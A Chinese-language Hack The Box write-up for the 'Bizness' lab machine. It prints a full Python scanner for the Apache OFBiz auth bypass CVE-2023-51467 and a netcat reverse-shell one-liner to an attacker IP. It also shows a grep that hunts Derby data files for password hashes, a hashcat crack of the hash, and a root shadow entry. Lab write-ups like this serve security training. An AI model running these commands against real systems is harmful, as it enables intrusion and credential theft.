HTB-Bizness笔记

admin
admin
admin
138658
文章
114
评论
2024年1月8日22:03:17评论194 views1字数 3812阅读12分42秒阅读模式

HTB-Bizness笔记

扫描靶机

nmap -sC -sV -T4 -Pn 10.10.11.252

HTB-Bizness笔记

得到一个bizness.htb的域名,添加到hosts

echo "10.10.11.252 bizness.htb" | sudo tee -a /etc/hosts

然后打开80端口看看

HTB-Bizness笔记

80端口表面是没有信息的,fuzz一下目录

dirsearch -u https://bizness.htb/

HTB-Bizness笔记

这貌似是一个后台登陆的页面

HTB-Bizness笔记

里面有很多信息,ofbiz,右下角有个18.12版本,直接在网上搜索对应的版本

HTB-Bizness笔记

首先是用该脚本检测并利用 Apache OFBiz

GitHub - Chocapikk/CVE-2023-51467: Apache OfBiz Auth Bypass Scanner for CVE-2023-51467

exploit.py

import osimport argparseimport requestsimport concurrent.futures
from threading import Lockfrom rich.console import Consolefrom typing import List, Optionalfrom urllib.parse import urlparsefrom alive_progress import alive_barfrom requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)console = Console()

class CVE_2023_51467:    def __init__(self, urls: List[str], threads: int, output_file: str):        self.urls = urls        self.threads = threads        self.output_file = output_file        self.file_lock = Lock()
    def check_url(self, base_url: str) -> Optional[str]:        parsed_url = urlparse(base_url)        schemes = ["http", "https"] if not parsed_url.scheme else [parsed_url.scheme]        for scheme in schemes:            url = f"{scheme}://{parsed_url.netloc}{parsed_url.path}"            if self.is_url_accessible(url):                return url        return None
    def is_url_accessible(self, url: str) -> bool:        try:            response = requests.head(url, verify=False, timeout=5, allow_redirects=True)            return response.status_code < 500        except requests.RequestException:            return False
    def scan_url(self, base_url: str):        target_url = self.check_url(base_url)
        if target_url:            try:                response = requests.get(                    f"{target_url}/webtools/control/ping?USERNAME&PASSWORD=test&requirePasswordChange=Y",                    verify=False,                    timeout=10,                    allow_redirects=True,                )
                if response.status_code == 200 and "PONG" in response.text:                    console.log(                        f"Vulnerable URL found: {base_url}, Response: {response.text.strip()}"                    )                    vulnerable_url = f"{urlparse(target_url).scheme}://{urlparse(target_url).netloc}n"                    with self.file_lock:                        with open(self.output_file, "a") as file:                            file.write(vulnerable_url)            except Exception as e:                console.log(f"Error scanning {base_url}: {e}")
    def run(self):        with alive_bar(len(self.urls), enrich_print=False) as bar:            with concurrent.futures.ThreadPoolExecutor(                max_workers=self.threads            ) as executor:                future_to_url = {                    executor.submit(self.scan_url, url): url for url in self.urls                }                for _ in concurrent.futures.as_completed(future_to_url):                    bar()

def main():    script_name = os.path.basename(__file__)    parser = argparse.ArgumentParser(        description="CVE-2023-51467 Scanner: Scans URLs for a specific vulnerability associated with CVE-2023-51467.",        epilog=f"Example usage:n"        f"    python {script_name} -u http://example.comn"        f"    python {script_name} -f urls.txt -o output.txt -t 50",        formatter_class=argparse.RawDescriptionHelpFormatter,    )    parser.add_argument("-u", "--url", help="Single URL to send GET request to")    parser.add_argument(        "-f", "--file", help="File containing list of base URLs to scan"    )    parser.add_argument(        "-o",        "--output",        default="output.txt",        help="File to write vulnerable systems to",    )    parser.add_argument(        "-t",        "--threads",        type=int,        default=10,        help="Number of concurrent threads to use",    )    args = parser.parse_args()
    urls = []    if args.file:        with open(args.file, "r") as file:            urls = [line.strip() for line in file]    elif args.url:        urls.append(args.url)    else:        console.log("No URL or file provided")        return
    scanner = CVE_2023_51467(urls, args.threads, args.output)    scanner.run()

if __name__ == "__main__":    main()

HTB-Bizness笔记

检测到了这个网址是带vuln的,所以使用大佬送的GUI工具

HTB-Bizness笔记

现在可以直接反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.22 4444 >/tmp/f

HTB-Bizness笔记

HTB-Bizness笔记

反弹shell后是直接在opt里面的,有点好奇,直接搜索底下的文件夹有什么

HTB-Bizness笔记

进入到/opt/ofbiz/runtime/data/derby,在里面有个ofbiz文件夹,里面的seg0文件夹有很多dat文件

HTB-Bizness笔记

直接使用grep进行password自字符进行搜索,因为是dat文件,将二进制当文本的表达出来

grep -arin -o -E '(w+W+){0,5}password(W+w+){0,5}' .

HTB-Bizness笔记

成功的找到了hash

HTB-Bizness笔记

从上面的哈希分析,这哈希是SHA系列的,$d$可能表示哈希的迭代次数或者是盐值(salt)的一部分,后面的编码是经过SHA处理的值,首先使用CyberChef解密

HTB-Bizness笔记

解密成hex,因为我们的哈希是加了盐,所以使用格式是:hash:salt🧂,直接使用hashcat破解,盐值是d

hashcat -m 120 hash /home/ioi/rockyou.txt

HTB-Bizness笔记

成功破解出密码是monkeybizness,直接提权,成功拿到user跟root flag

HTB-Bizness笔记

root:$y$j9T$pJW9XfkWvA4ozHorBy1kA1$MMNByIaVvdq4YrIpvYDEIfckbiKog11HxKcxJkAZLcA:19709:0:99999:7:::


原文始发于微信公众号(Jiyou too beautiful):HTB-Bizness笔记

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月8日22:03:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-Bizness笔记https://cn-sec.com/archives/2376170.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息